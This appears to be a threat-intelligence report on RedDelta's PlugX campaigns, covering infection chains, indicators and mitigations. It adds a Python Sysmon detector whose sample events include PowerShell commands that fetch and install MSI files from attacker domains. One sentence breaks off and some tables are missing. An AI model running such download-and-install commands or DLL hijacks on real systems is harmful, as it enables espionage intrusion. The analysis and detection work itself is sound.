##### CYBER THREAT ANALYSIS By Insikt Group® **CHINA** January 9, 2025

# Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain

- **RedDelta has evolved its infection chain multiple times since mid-2023.** The group has used LNK files and MSC files as the first-stage components and ultimately loaded PlugX via search order hijacking.
- **The group consistently used Cloudflare's CDN to proxy C2 traffic to threat actor-controlled C2 servers.** This enables RedDelta to blend in with legitimate traffic and complicates victim identification for security researchers.
- **RedDelta is potentially operating out of Henan province.** Insikt Group identified ten IP addresses in Henan province used by RedDelta to administer its PlugX C2 servers.

-----

_Note: The analysis cut-off date for this report was December 6, 2024._

## Executive Summary

Between July 2023 and December 2024, Insikt Group observed the Chinese state-sponsored threat activity group RedDelta[1] primarily targeting Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia with an adapted infection chain to distribute their customized PlugX backdoor. The group used lure documents themed around the 2024 Taiwanese presidential candidate Terry Gou (郭台銘), the Vietnamese National Holiday, flood protection in Mongolia, and meeting invitations, including an Association of Southeast Asian Nations (ASEAN) meeting. Insikt Group observed evidence that the Mongolian Ministry of Defense was likely compromised in August 2024 and that the Communist Party of Vietnam was compromised in November 2024. RedDelta conducted spearphishing targeting the Vietnamese Ministry of Public Security; however, there were no indications of a successful compromise. Additionally, from September to December 2024, Insikt Group identified likely victims in Malaysia, Japan, the United States, Ethiopia, Brazil, Australia, and India.
In the latter half of 2023, RedDelta evolved the initial part of its infection chain to leverage a Windows shortcut (LNK) file likely delivered via spearphishing, which downloaded and installed a remotely hosted Windows Installer (MSI) file. This MSI file then dropped a search order hijacking triad that loaded PlugX, as seen in previous RedDelta activity. In 2024, Insikt Group observed the group shift from using LNK files to Microsoft Management Console Snap-In Control (MSC) files as the first-stage component. Most recently, the group shifted to using a spearphishing link to get the victim to load an HTML file remotely hosted on Microsoft Azure, which started the remainder of the infection chain.

Since July 2023, RedDelta has consistently used the Cloudflare content delivery network (CDN) service to proxy command-and-control (C2) traffic to threat actor-controlled C2 servers. This enables the group to blend in with legitimate CDN traffic and complicates victim identification for security researchers. Recently, Insikt Group has observed multiple state-sponsored groups [leveraging Cloudflare to evade detection](https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service), including the Russian state-sponsored group BlueAlpha.

RedDelta continues to operate in line with Chinese strategic priorities. The group has historically targeted governments and diplomatic organizations in Southeast Asia, Mongolia, and Europe. The Asia-focused targeting in 2023 and 2024 represents a return to the group’s historical focus after [targeting European organizations in 2022](https://www.recordedfuture.com/research/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant) following the start of the Russia-Ukraine war. RedDelta’s targeting of Mongolia and Taiwan is consistent with the group’s past [targeting of groups seen as](https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf?)
threatening to the Chinese Communist Party’s power, including Mongolian non-governmental organizations (NGOs), the Vatican, and Catholic organizations in Hong Kong.

[1] RedDelta closely overlaps with public reporting under the aliases BRONZE PRESIDENT, Mustang Panda, Stately Taurus, Earth Preta, Red Lich, TA416, HoneyMyte, Twill Typhoon, Vertigo Panda, and Dark Peony.

CTA-CN-2025-0109 Recorded Future® | [www.recordedfuture.com](http://www.recordedfuture.com)

-----

Insikt Group followed responsible disclosure in advance of this publication per Recorded Future's prenotification policy.

## Key Findings

- Since July 2023, RedDelta targeted Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia with its customized backdoor PlugX.
- RedDelta has evolved its infection chain multiple times since mid-2023. The group has used LNK files and MSC files as the first-stage components. In both cases, a PowerShell command downloaded and installed a remotely hosted Windows Installer (MSI) file. This MSI file dropped a malicious dynamic-link library (DLL) loader written in the Nim programming language, a legitimate binary vulnerable to search order hijacking, and an encrypted payload that ultimately loads PlugX.
- The group has consistently registered new domains that use the Cloudflare content delivery network (CDN) to proxy C2 traffic to the group’s backend threat actor-controlled virtual private servers (VPSs).
- Insikt Group identified IP addresses in Henan province used by RedDelta to administer its PlugX C2 servers, pointing to a potential threat actor operating location.

## Background

RedDelta has been active since [at least 2012](https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/) and has [focused on Southeast Asia and Mongolia](https://www.secureworks.com/research/bronze-president-targets-ngos). The group has routinely adapted its targeting in response to global geopolitical events.
For instance, RedDelta targeted [the Vatican](https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf) and [other Catholic organizations](https://www.recordedfuture.com/research/reddelta-cyber-threat-operations) with PlugX in the lead-up to 2021 talks between China and the Vatican. The group has also [compromised law enforcement and government entities in India](https://www.recordedfuture.com/research/reddelta-cyber-threat-operations), a government organization in Indonesia, and other targets across Myanmar, Hong Kong, and Australia. [In 2022, the group shifted toward increased targeting of European government and diplomatic entities](https://www.recordedfuture.com/research/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant) following Russia's invasion of Ukraine. This activity used an infection chain that began by delivering an archive file (ZIP, RAR, or ISO), likely via spearphishing, that contained a Windows shortcut (LNK) file disguised using a double extension (such as .doc.lnk) and a Microsoft Word icon. The archive file also featured a series of nested hidden folders containing three files used to complete DLL search order hijacking: a legitimate binary, a malicious DLL loader, and an encrypted PlugX payload that was ultimately loaded into memory. User execution of the shortcut file led to the execution of the legitimate binary vulnerable to DLL search order hijacking. In November 2022, Insikt Group observed an evolution in tactics, in which RedDelta staged the ISO file on a threat actor-controlled domain.

In March 2023, Insikt Group identified RedDelta targeting Mongolia using a similar infection chain that started with a container file (RAR, ZIP, ISO) consisting of an LNK file that triggered a DLL search order hijacking triad located within a hidden nested subdirectory.
The campaign used a decoy document masquerading as an invitation from the World Association of Mongolia and a document purporting to be a BBC news interview about Tibetan Buddhism and Mongolia. RedDelta targeted the following groups and individuals:

- Members of multiple Mongolian NGOs, including a human rights and pro-democracy NGO focused on the autonomous region of Inner Mongolia in China
- Multiple Mongolian Buddhist activists based in Mongolia and Japan
- Academic professionals in Mongolia and Japan
- The developers of two separate Mongolian mobile applications

## Threat and Technical Analysis

**_Figure 1: Timeline of RedDelta activity from 2023 and 2024 (Source: Recorded Future)_**

#### Cloudflare CDN Used to Proxy Command-and-Control Traffic

Beginning in July 2023, Insikt Group observed a shift across RedDelta command-and-control (C2) infrastructure characterized by the addition of [Cloudflare Origin CA transport layer security (TLS) certificates](https://developers.cloudflare.com/ssl/origin-configuration/origin-ca/) on Transmission Control Protocol (TCP) port 443. This shift is indicative of the group’s use of the Cloudflare CDN service to proxy C2 traffic to these backend threat actor-controlled servers in an attempt to blend in among benign CDN traffic. In all cases, the domain configured to use the Cloudflare CDN service is visible via the subject alternative names (SANs) field on the accompanying TLS certificate on these backend C2s. By analyzing Cloudflare Origin CA certificates served by known RedDelta C2 servers, Insikt Group identified over 100 threat actor-controlled domains (see Appendix A). Almost all domains are likely formerly legitimate domains re-registered via Namecheap or NameSilo by the threat actor after expiry, likely to evade domain age and trust heuristics.
In May 2024, Insikt Group identified RedDelta using Cloudflare's geofencing capabilities for the first time to restrict the downloading of the latter stages of the group’s infection chain to IP addresses geolocating to Myanmar. RedDelta continues leveraging these capabilities, including geofencing a malicious MSC file to Vietnam in August 2024.

#### New Infection Chain Leveraging Windows Shortcut (LNK) and Windows Installer (MSI) Files Used to Continue Targeting Mongolia (July 2023)

In July 2023, Insikt Group identified RedDelta targeting Mongolia with a new infection chain to load the group’s customized PlugX backdoor. In this campaign, the group shifted tactics, techniques, and procedures (TTPs) by adopting a new infection chain and using the Cloudflare CDN service to proxy C2 traffic to threat actor-controlled C2 servers. In this case, the group used a Windows LNK file to run a PowerShell command, which downloaded and installed a remotely hosted Windows Installer (MSI) file. This MSI file then dropped a legitimate executable, a malicious loader DLL written in the Nim programming language, and an encrypted payload that ultimately loaded the group’s customized PlugX backdoor via DLL search order hijacking (see Figure 2).

**_Figure 2: RedDelta infection chain observed in Mongolia targeting from July 2023 (Source: Recorded Future)_**

Insikt Group identified three files observed communicating with RedDelta servers at the time (Table 1).
|SHA256|Filename(s)|Contacted IP Address or Domain|
|---|---|---|
|a0a3eeb6973f12fe61e6e90fe5fe8e406a8e00b31b1511a0dfe9a88109d0d129|Үер усны сэрэмжлүүлэг.lnk|estmongolia[.]com|
|471e61015ff18349f4bf357447597a54579839336188d98d299b14cff458d132|Үер усны сэрэмжлүүлэг.msi|mongolianshipregistrar[.]com|
|7c741c8bcd19990140f3fa4aa95bb195929c9429fc47f95cf4ab9fad03040f7b|AdobePlugin.msi|103.107.104[.]37|

**_Table 1: Observed files communicating with RedDelta servers in July 2023 (Source: Recorded Future)_**

The LNK file Үер усны сэрэмжлүүлэг.lnk (translation from Mongolian: Flood warning.lnk) shown in Table 1 ran the PowerShell command shown in Figure 3 to retrieve a remotely hosted MSI file from the RedDelta domain estmongolia[.]com and install it using the install.InstallProduct method.

**_Figure 3: PowerShell command run by shortcut file Үер усны сэрэмжлүүлэг.lnk (Source: Recorded Future)_**

The retrieved file is Үер усны сэрэмжлүүлэг.msi in Table 1, which dropped three files following installation into the newly created folder C:\Users\Admin\AppData\Local\GkyOpucv:

- A legitimate executable: ONENOTEM.exe (sha256: b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93)
- A malicious loader DLL: msi.dll (sha256: 67c23db357588489031700ea8c7dc502a6081d7d1a620c03b82a8f281aa6bde6)
- An encrypted payload: NoteLogger.dat (sha256: 0df7e56610adad2ed5adfdfab07faedc08a61d9f944a5448aa62e071cffc28c4)

The ONENOTEM.exe file executed the msi.dll via DLL search order hijacking, which then decrypted NoteLogger.dat to load the group’s customized PlugX variant into memory. Once loaded, the PlugX payload contacts the C2 domain mongolianshipregistrar[.]com. The PlugX C2 request headers remained the same as cited in the Insikt Group report titled [“RedDelta Targets European Government Organizations and Continues to Iterate Custom PlugX Variant”](https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf) (page 10), shown in Figure 4. Notably, the loader DLL observed in this activity was written in Nim, marking a departure from the loaders previously observed in use by RedDelta.

**_Figure 4: RedDelta PlugX C2 headers observed in highlighted sample (Source: Recorded Future Malware Intelligence)_**

Following the execution, a decoy PDF document is shown to the user (also called Үер усны сэрэмжлүүлэг.pdf), which is written in Mongolian and relates to flood protection. The legitimate executable and loader files were then moved to the directory C:\Users\Public\SecurityScan\. For persistence, the legitimate executable ONENOTEM.exe is executed upon start-up via the Run registry key using the key name OneNote Update. The encrypted payload NoteLogger.dat was stored in a separate hidden folder at C:\Users\Public\.vsCodes\NoteLogger.dat.
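As an added detection example (not Recorded Future's code, and not the Sigma rules the report references in Appendix C), the following Python checks Sysmon-style events for the three host-level stages this report describes: a LNK or MSC first stage (explorer.exe or mmc.exe) spawning PowerShell that installs a remote MSI through the Windows Installer InstallProduct method, the legitimate binary loading msi.dll or FormDll.dll from a user-writable staging directory, and Run-key persistence under the value names OneNote Update and inkform Update. The function and constant names (`check_event`, `scan`, `Finding`, `SAMPLE_EVENTS`) are this example's own; the events are constructed, and the PowerShell syntax (WindowsInstaller.Installer COM object), the SID and the URL paths are placeholders, since the report reproduces the actual command only as an image.

```python
"""Host-level detections for the RedDelta chain in this report:
LNK/MSC first stage -> PowerShell InstallProduct of a remote MSI ->
DLL search order hijack (msi.dll / FormDll.dll) -> Run-key persistence.
Added example; not Recorded Future's code or its Appendix C Sigma rules.
Events are constructed to resemble Sysmon Event ID 1 (process create),
7 (image load) and 13 (registry value set) fields."""
import re
from dataclasses import dataclass

# Parents that launch the first stage: explorer.exe for a double-clicked
# LNK, mmc.exe for an MSC console (the May/August 2024 samples).
FIRST_STAGE_PARENTS = {"explorer.exe", "mmc.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Windows Installer COM automation. Assumption: the command uses the
# WindowsInstaller.Installer object; the report cites only InstallProduct.
INSTALLPRODUCT_RE = re.compile(r"windowsinstaller\.installer|installproduct", re.I)
# Do not require a .msi suffix: the May 2024 MSC samples fetched
# extension-less paths such as /brjwcabz (Table 2).
REMOTE_URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
# Run-key value names reported for persistence.
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\([^\\]+)$", re.I)
RUN_VALUE_NAMES = {"onenote update", "inkform update"}
# Staging directories reported for the triad and the encrypted .dat payload.
STAGING_DIR_RE = re.compile(
    r"^c:\\(?:users\\public|programdata|users\\[^\\]+(?:\\appdata\\(?:local|roaming))?)\\"
    r"(?:securityscan|samsungdriver|intelnet|virtualfile|\.vscodes|\.inkform)\\", re.I)
# DLL names the legitimate binary loads from a non-system directory.
HIJACKED_DLLS = {"msi.dll", "formdll.dll"}
SYSTEM_DIR_RE = re.compile(r"^c:\\windows\\(?:system32|syswow64)\\", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the findings for one Sysmon-style event dict (possibly none)."""
    out = []
    eid = ev.get("EventID")
    if eid == 1:
        parent = _basename(ev.get("ParentImage", ""))
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        url = REMOTE_URL_RE.search(cmd)
        if image in POWERSHELL and INSTALLPRODUCT_RE.search(cmd) and url:
            # Any remote InstallProduct is suspicious; the LNK/MSC parent is
            # what ties it to the chain described in the report.
            sev = "high" if parent in FIRST_STAGE_PARENTS else "medium"
            out.append(Finding("remote_msi_installproduct", 1,
                               f"{sev}: {parent} -> {image} fetches {url.group(0)}"))
    elif eid == 7:
        loaded = ev.get("ImageLoaded", "")
        if _basename(loaded) in HIJACKED_DLLS and not SYSTEM_DIR_RE.match(loaded):
            out.append(Finding("dll_search_order_hijack", 7,
                               f"{_basename(ev.get('Image', ''))} loaded {loaded}"))
    elif eid == 13:
        m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
        details = ev.get("Details", "")
        if m and (m.group(1).lower() in RUN_VALUE_NAMES or STAGING_DIR_RE.match(details)):
            out.append(Finding("run_key_persistence", 13, f"{m.group(1)} = {details}"))
    return out


def scan(events):
    """Run every event through check_event and flatten the findings."""
    return [f for ev in events for f in check_event(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUN = r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run"
# Constructed events: domains, value names and directories are the ones the
# report describes; URL paths, the SID and the command syntax are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -c \"$i=New-Object -ComObject "
                    "WindowsInstaller.Installer;$i.InstallProduct("
                    "'https://estmongolia.com/placeholder.msi')\""},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\mmc.exe", "Image": PS,
     "CommandLine": "powershell -c \"(New-Object -ComObject WindowsInstaller"
                    ".Installer).InstallProduct('https://versaillesinfo.com/brjwcabz')\""},
    {"EventID": 7, "Image": r"C:\Users\Public\SecurityScan\ONENOTEM.exe",
     "ImageLoaded": r"C:\Users\Public\SecurityScan\msi.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\msiexec.exe",  # benign load
     "ImageLoaded": r"C:\Windows\System32\msi.dll"},
    {"EventID": 13, "TargetObject": RUN + r"\OneNote Update",
     "Details": r"C:\Users\Public\SecurityScan\ONENOTEM.exe"},
    {"EventID": 13, "TargetObject": RUN + r"\inkform Update",
     "Details": r"C:\ProgramData\Intelnet\inkform.exe"},
    {"EventID": 13, "TargetObject": RUN + r"\OneDrive",  # benign autorun
     "Details": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

The image-load rule is the one that survives a change of staging directory, since it keys on msi.dll or FormDll.dll being resolved outside the system directory rather than on any reported path.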
**_Figure 5: Decoy document Үер усны сэрэмжлүүлэг.pdf shown to the user; it is written in Mongolian and relates to flood protection (Source: Recorded Future)_**

The second MSI file shown in Table 1 (AdobePlugin.msi) featured an identical infection chain to the above, dropping the following malicious files alongside the benign ONENOTEM.exe executable:

- Nim loader msi.dll (sha256: b6f375d8e75c438d63c8be429ab3b6608f1adcd233c0cc939082a6d7371c09bb)
- Encrypted payload Notelogger.dat (sha256: 095855cf6c82ae662cce34294f0969ca8c9df266736105c0297d2913a9237dd1)

In this case, the PlugX payload was configured with the C2 IP address 103.107.104[.]37 rather than a domain using the Cloudflare CDN service.

#### Taiwan Targeting (October 2023)

In October 2023, Insikt Group identified two Taiwan-themed malware samples associated with RedDelta infrastructure. The group used decoy documents themed around the 2024 Taiwanese presidential election and a residential renovation project in Taiwan’s capital, Taipei.

##### Taiwanese Presidential Election-Themed Sample

The first sample was an MSI file (sha256: c7ec098093eb08d2b36d1c37b928d716d8da021f93319a093808a7ceb3b35dc1), which dropped three files following execution:

- A legitimate executable: ONENOTEM.exe (sha256: b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93)
- A malicious loader DLL: msi.dll (sha256: 651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859)
- An encrypted payload: NoteLogger.dat (sha256: 908ff3a80ef065ab4be1942e0d41583903f6aac02d97df6b4a92a07a633397a8)

The malicious loader DLL msi.dll was loaded via DLL search order hijacking by OnesNotem.exe and ultimately decrypted the NoteLogger.dat file containing the PlugX payload.
For persistence, OnesNotem.exe and msi.dll were placed into the folder C:\Users\\AppData\Local\MUxPOTy\, and NoteLogger.dat was placed into the C:\ProgramData\.vscodes\ folder. The legitimate executable OnesNotem.exe was executed upon start-up via the Run registry key using the key name OneNote Update in an identical manner observed in the previous Mongolia-focused targeting. The infection chain ultimately loaded the PlugX backdoor into memory, which then communicated to two RedDelta C2 domains, ivibers[.]com and meetviberapi[.]com, which were proxied via Cloudflare to the backend threat actor-controlled C2 IP addresses 207.148.119[.]237 and 209.250.241[.]108. The user is also shown a Taiwan-themed decoy document regarding the Taiwanese presidential campaign of Terry Gou (郭台銘) with the filename 郭台銘選擇賴佩霞為總統副手深層考量.pdf (translation: Terry Gou carefully considers choosing Lai Peixia as presidential deputy.pdf), as shown in Figure 6.

**_Figure 6: Taiwan presidential campaign-themed decoy document displayed to user following PlugX infection chain (Source: Recorded Future)_**

##### Taipei Residential Renovation-Themed Sample

The second identified sample, 6460c7.msi (sha256: 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321), used an identical infection chain. In this case, the PlugX payload communicates to the RedDelta C2 domain electrictulsa[.]com, proxied via Cloudflare to the backend threat actor-controlled C2 IP address 64.176.50[.]176. This sample dropped the same legitimate executable as discussed above, as well as the following two files:

- A malicious loader DLL: msi.dll (sha256: f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5)
- An encrypted payload: NoteLogger.dat (sha256: a5cd617434e8d0e8ae25b961830113cba7308c2f1ff274f09247de8ed74cac4f)

The legitimate binary and DLL were placed into the C:\ProgramData\SamsungDriver\ folder. Like the above, the encrypted PlugX payload was placed in the C:\ProgramData\.vscodes\ folder.

The user is also shown a decoy document themed around a residential renovation project in Taipei with the filename 水源路二至五期整建住宅都市更新推動說明.pdf (translation: Instructions for urban renewal promotion of residential buildings in Phases 2 to 5 of Shuiyuan Road.pdf), as shown in Figure 7.

**_Figure 7: Taipei residential renovation-themed decoy document displayed to user following PlugX infection chain (Source: Recorded Future)_**

#### Myanmar Targeting and Use of Microsoft Management Console (MSC) Files (May 2024)

Insikt Group observed RedDelta targeting Myanmar with an updated infection chain in May 2024, as shown in Figure 8. This RedDelta activity involved an adapted initial infection chain, now incorporating Microsoft Management Console Snap-In Control (MSC) files as the first-stage component instead of the Windows LNK files seen in previous RedDelta activity. Upon execution, the MSC file was configured to run a PowerShell command that downloaded and installed a remotely hosted MSI file, with the remainder of the infection chain closely resembling the RedDelta activity described above.
**_Figure 8: Updated RedDelta infection chain observed in May 2024 (Source: Recorded Future)_**

Insikt Group identified the group using Cloudflare's geofencing capabilities for the first time to restrict downloading the latter stages of the group’s infection chain to target countries — in this case, Myanmar.

##### Initial Microsoft Management Console Snap-In Control (.msc) Files

RedDelta domains were used to stage files fetched via initial MSC samples likely distributed via spearphishing (see Table 2). In May 2024, the Myanmar National Cyber Security Center [posted on a public malware repository](https://www.virustotal.com/gui/file/1cbf860e99dcd2594a9de3c616ee86c894d85145bc42e55f4fed3a31ef7c2292/community) that Meeting_Invitation.msc (sha256: 1cbf860e99dcd2594a9de3c616ee86c894d85145bc42e55f4fed3a31ef7c2292) was a lure document targeting government entities. These MSC files are executed using the native Windows binary mmc.exe and display a console purporting to contain a lure PDF document (see Figure 9).
|SHA256|File Name|Next Stage URL|
|---|---|---|
|1cbf860e99dcd2594a9de3c616ee86c894d85145bc42e55f4fed3a31ef7c2292|Meeting_Invitation.msc|https[:]//versaillesinfo[.]com/brjwcabz|
|54549745868b27f5e533a99b3c10f29bc5504d01bd0792568f2ad1569625b1fd|240422 264-24 SOLO airfield surveys.msc|https[:]//lifeyomi[.]com/trkziu|
|8c9e1f17e82369d857e5bf3c41f0609b1e75fd5a4080634bc8ae7291ebe2186c|Meeting Invitation.msc|https[:]//lebohdc[.]com/uleuodmm|

**_Table 2: RedDelta Microsoft Management Console Snap-In Control (MSC) files observed in May 2024 (Source: Recorded Future)_**

**_Figure 9: Screenshot of Microsoft Management Console Snap-In Control file sample Meeting_Invitation.msc (Source: Recorded Future)_**

When the user clicks the purported PDF hyperlink, the MSC file runs a PowerShell command to download and install a remotely hosted MSI file via the command shown in Figure 10. This command resembles those observed in historical RedDelta LNK files described above.
**_Figure 10: PowerShell command executed by a.msi file to fetch and install a remotely staged Windows Installer file (Source: Recorded Future)_**

#### Next Stage Windows Installer (MSI) and DLL Search Order Hijacking Chain

Upon installation, the fetched MSI file brjwcabz.msi (sha256: d4b9f7c167bc69471baf9e18afd924cf9583b12eee0f088c98abfc55efd77617) dropped three files:

- A legitimate executable: inkform.exe (sha256: 87d0abc1c305f7ce8e98dc86712f841dd491dfda1c1fba42a70d97a84c5a9c70)
- A malicious loader DLL: FormDll.dll (sha256: 288e79407daae7ae9483ef789d035d464cf878a611db453675ba1a2f6beb1a03)
- An encrypted payload: inkformDB.dat (sha256: 4ac2a633904b0da3ac471776ecbaded91e1f3a5107630fafde76868cace46051)

Following the execution of this DLL search order hijacking chain, the group’s customized PlugX variant is loaded into memory and uses the C2 domain shreyaninfotech[.]com. In this analyzed sample, following execution, the three DLL search order hijacking files were copied to a new location to enable persistence via Run registry keys. Insikt Group observed the use of multiple file paths within the same sample, which are randomly selected during each initial execution (Figure 11).
```
C:\Users\Admin\AppData\Roaming\.inkform\inkformDB.dat
C:\Users\Admin\AppData\Roaming\VirtualFile\inkform.exe
C:\Users\Admin\AppData\Roaming\VirtualFile\FormDll.dll
C:\Users\Public\.inkform\inkformDB.dat
C:\Users\Public\Intelnet\FormDll.dll
C:\Users\Public\Intelnet\inkform.exe
C:\Users\Public\.inkform\inkformDB.dat
C:\Users\Public\SecurityScan\FormDll.dll
C:\Users\Public\SecurityScan\inkform.exe
C:\ProgramData\.inkform\inkformDB.dat
C:\ProgramData\Intelnet\FormDll.dll
C:\ProgramData\Intelnet\inkform.exe
C:\Users\Admin\.inkform\inkformDB.dat
C:\Users\Admin\SamsungDriver\inkform.exe
C:\Users\Admin\SamsungDriver\FormDll.dll
```

**_Figure 11: Observed file paths used by brjwcabz.msi, which are randomly selected during initial execution (Source: Recorded Future)_**

A new Run registry key value, inkform Update, is also created for persistence, which executes inkform.exe upon user login. In addition to the use of the signed Microsoft inkform.exe executable for DLL search order hijacking, Insikt Group also observed the use of a second signed executable

#### Mongolian Ministry of Defense, Myanmar, and Vietnam Targeting (August 2024)

In August 2024, Insikt Group observed renewed RedDelta activity that compromised the Mongolian Ministry of Defense and entities in Myanmar with the group’s customized PlugX backdoor. The group also conducted some limited targeting in Bahrain and Ethiopia. In addition, RedDelta conducted spearphishing against the Vietnamese Ministry of Public Security; however, there were no indications of a successful compromise.
In this observed activity, the Windows Installer files all dropped a legitimate and lesser-observed Logitech executable vulnerable to DLL search order hijacking, LDeviceDetectionHelper.exe (sha256: 282fc12e4f36b6e2558f5dd33320385f41e72d3a90d0d3777a31ef1ba40722d6), a malicious loader DLL written in Nim, and a DAT file containing the encrypted PlugX payload. For the first time, Insikt Group observed that the MSC files all used the [GrimResource](https://www.elastic.co/security-labs/grimresource) technique to execute arbitrary code in Microsoft Management Console (mmc.exe) files (Table 3).

|SHA256|Filename|Next Stage URL|
|---|---|---|
|00619a5312d6957248bac777c44c0e9dd871950c6785830695c51184217a1437|Pg 151 vv nghi le Quoc khanh 2.9.msc|kxmmcdmnb[.]online (likely geofenced to Vietnam)|
|ca0dfda9a329f5729b3ca07c6578b3b6560e7cfaeff8d988d1fe8c9ca6896da5|Meeting invitation.msc|https[:]//cdn7s65[.]z13[.]web.core[.]windows[.]net|
|eae187a91f97838dbb327b684d6a954beee49f522a829a1b51c1621218039040|BCTT 02.9 AM Final.docx.msc|lokjopppkuimlpo[.]shop|
|d0c4eb52ea0041cab5d9e1aea17e0fe8a588879a03415f609b195cfbd69caafc|Meeting.msc|goclamdep[.]net|
|6784b646378c650a86ba4fdd4baaaf608e5ecdf171c71bb7720f83965cc8c96f|Meeting.msc|goclamdep[.]net|

#### Use of HTML Files and Wider Targeting (September–November 2024)

In September 2024, Insikt Group became aware of RedDelta using HTML files, disseminated by links in phishing emails, that directed the user to malicious MSC files if the user was running Windows OS. After distributing the malicious MSC via HTML file, RedDelta continued to use the same infection chain described above and also used the lesser-observed LDeviceDetectionHelper.exe for DLL search order hijacking. In October 2024, Insikt Group observed the group using a new legitimate executable, imecmnt.exe (sha256: 80a7ff01de553cb099452cb9fac5762caf96c0c3cd9c5ad229739da7f2a2ca72).
**_Figure 15: RedDelta infection chain observed in use in September 2024 (Source: Recorded Future)_**

|SHA256|File Name|Next Stage URL|
|---|---|---|
|c1f27bed733c5bcf76d2e37e1f905d6c4e7abaeb0ea8975fca2d300c19c5e84f|ADSOM-Plus - Meeting Programme.msc|https[:]//elevateecom[.]com/deqcehfg|
|397afb74746b2fe01abc63789412b38f44ceb234a278a04b85b2bb5b4e64cc8c|Meeting Invitation.msc|https[:]//vabercoach[.]com/uenic|
|49abaa2ba33af3ebde62af1979ed7a4429866f4f708e0d8e9cfffcfa7a279604|Meeting Procedure.msc|https[:]//artbykathrynmorin[.]com/lczjnmum|

Insikt Group identified an infection chain themed around the Microsoft Office Input Method Editor (IME), which enables users to input non-QWERTY characters. The Windows Installer (MSI) file Adobe-Setup.msi (sha256: 62adbe84f0f19e897df4e0573fc048272e0b537d5b34f811162b8526b9afaf32) dropped three files:

- A legitimate executable: imecmnt.exe (sha256: 80a7ff01de553cb099452cb9fac5762caf96c0c3cd9c5ad229739da7f2a2ca72) that Insikt Group had not previously observed RedDelta using
- A malicious loader DLL (sha256: 557f04c6ab6f06e11032b25bd3989209de90de898d145b2d3a56e3c9f354d884)
- An encrypted payload: officeime.dat (sha256: 5dae5254493df246c15e52fd246855a5d0a248f36925cecee141348112776275)

The PlugX C2 in this infection chain was 116.206.178[.]67. RedDelta also recently [used DLL sideloading of the legitimate executable imecmnt.exe to load ShadowPad](https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/) in an espionage operation targeting Southeast Asian government entities.

Insikt Group observed an IP address associated with the Communist Party of Vietnam communicating with PlugX C2 103.238.227[.]183 in November 2024.
Additionally, from September to December 2024, Insikt Group identified communications between RedDelta PlugX servers 103.238.227[.]183 and 103.238.225[.]248, as well as unattributable IP addresses in Myanmar, Malaysia, Japan, the United States, Ethiopia, Brazil, Australia, and India.

**_Figure 16: The Communist Party of Vietnam IP address geolocates near the Central Office of the Communist Party of Vietnam (Vietnamese: “Văn phòng Trung ương Đảng Cộng sản”) in Hanoi, Vietnam (Source: Google Maps)_**

#### RedDelta Administration Servers

From August to December 2024, Insikt Group identified ten RedDelta administration servers communicating with known RedDelta C2s 103.238.227[.]183 and 103.238.225[.]248 on TCP port 5000 (Table 5). These IPs are all registered to China Unicom Henan province, suggesting the threat actor may be operating out of Henan province.

## Mitigations

Users should conduct the following measures to detect and mitigate observed TTPs associated with RedDelta activity:

- Deploy the YARA and Sigma rules written by Insikt Group, detailed in Appendix C, to detect RedDelta MSI, DLL, and LNK files.
- Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
- Keep all software and applications up to date, particularly operating systems, antivirus software, and core system utilities.
- Filter email correspondence and scrutinize attachments for malware.
- Make regular backups of your system and store the backups offline, preferably offsite so data cannot be accessed via the network.
- Adhere to strict compartmentalization of company-sensitive data. In particular, review which data anyone with access to a single employee account or device could reach (for example, after device or account takeover via phishing).
- Strongly consider instituting role-based access, limiting company-wide data access, and restricting access to sensitive data.
- Employ host-based controls; host-level logging and host intrusion detection are among the best defenses and earliest warning signals for thwarting attacks.
- Disable basic and legacy authentication where possible, as these can allow attackers to bypass in-place security measures.
- Implement baseline detection and incident response capabilities, such as network IDS, NetFlow collection, host logging, and web proxying, alongside manual monitoring of these detection sources.
- Practice network segmentation and ensure special protections exist for sensitive information, such as multifactor authentication and tightly restricted access, with storage on systems reachable only from the internal network.
- [Recorded Future Third-Party Intelligence module](https://www.recordedfuture.com/license-options/) users can monitor real-time output to identify suspected targeted intrusion activity involving key vendors and partners within physical, network, and software supply chains.
- By monitoring Malicious Traffic Analysis (MTA), Recorded Future customers can alert on and proactively monitor infrastructure that may be involved in notable communication with known RedDelta command-and-control (C2) IP addresses.
